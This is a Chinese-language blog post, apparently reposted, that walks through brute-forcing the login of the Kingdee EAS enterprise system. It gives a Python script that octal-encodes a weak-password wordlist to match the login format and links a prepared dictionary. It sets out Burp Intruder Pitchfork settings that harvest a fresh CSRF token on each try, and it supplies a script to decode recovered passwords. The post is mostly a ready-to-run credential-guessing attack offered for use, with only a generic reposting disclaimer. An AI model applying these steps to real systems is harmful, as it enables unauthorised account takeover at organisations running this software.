金蝶EAS密碼暴力破解漏洞 | 今天遇到一個金蝶EAS系統, 發現它登錄時密碼進行編碼了,這里解碼一下


可惜我不知道適用版本,當然了你進行用戶名枚舉是一樣的方法....hi✿(。◕ᴗ◕。)✿

查看編碼

抓包發現僅僅是最簡單的ascii編碼而已, 這里小小的解碼一下,氣死我了,原來是八進制,氣死我了

字典處理代碼

# python 3.9
# windows
# 如果遇到什么gbk報錯啥的,把你的字典用記事本打開另存為UTF-8即可

def write_to_file(passwd_list_):
    with open("F:\\weakpass_dict\\0.7.jin_dieEAS.txt", "a") as f_:
        for _ in passwd_list_:
            f_.write(_ + "\n")


with open("F:\\weakpass_dict\\0.7.txt", "r") as f:
    lines = f.readlines()  # 全部讀到內存里去, 沒有大內存能搞好安全嗎?
    number = 0
    passwd_list = []
    for i in lines:  # 遍歷字典
        passwd = ""
        for j in i[:-1]:  # 不要尾部的回車換行 # %2C61%2C62%2C63%2C64%2C65%2C66
            passwd += "%2C" + str(oct(ord(j)))[2:]  # 對每個密碼進行變換
        passwd_list.append(passwd)
        number += 1
        if number == 1000:  # 1千個密碼寫一次文件, 嗯, 考慮到文件讀寫比較慢(( • ̀ω•́ )✧)
            write_to_file(passwd_list)
            number = 0
            passwd_list = []
    write_to_file(passwd_list)

生成的字典

想要直接用的話, github也傳了一份,直接下載就好了
https://github.com/sanqiushu-ns/sanqiushu_passwd_dicts/blob/main/%E9%87%91%E8%9D%B6EAS/0.7.jin_dieEAS.txt

開始爆破

在開始爆破的時候發現竟然有CSRF token, 好吧,無傷大雅
抓到爆破包,給這四個打上標記,選Pitchfork模式, 然后記住這四個payload的順序

然后先轉到設置頁面,把線程設置為1, 然后添加三個匹配規則,對應一開始標記的4個payload的后三個

這個要添加三次,分別對應這三個地方,當然了,我們只標記雙引號里的值

然后到payload頁面,去分別設置1,2,3,4這四個payload的值
1是密碼,payload type 選Simple list ,然后load 我們用代碼生成的字典

2是it這個參數,payload type 選Recursive grep ,然后payload options點一下第一個,然后那個payload for first 要刷新一下頁面,去取一個新的(舊的用過一次就不能用了)

3,跟2一樣的
4,也差不多
開始跑吧,沒想到啊

如果你能有幸跑出密碼這里有個反編碼的小腳本

a = "%2C120%2C100%2C163%2C163%2C167%2C60%2C162%2C144"
b = a.split("%2C")[1:]

print(b)
c = ""
for i in b:
    c += chr(int(i, 8))
print(c)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM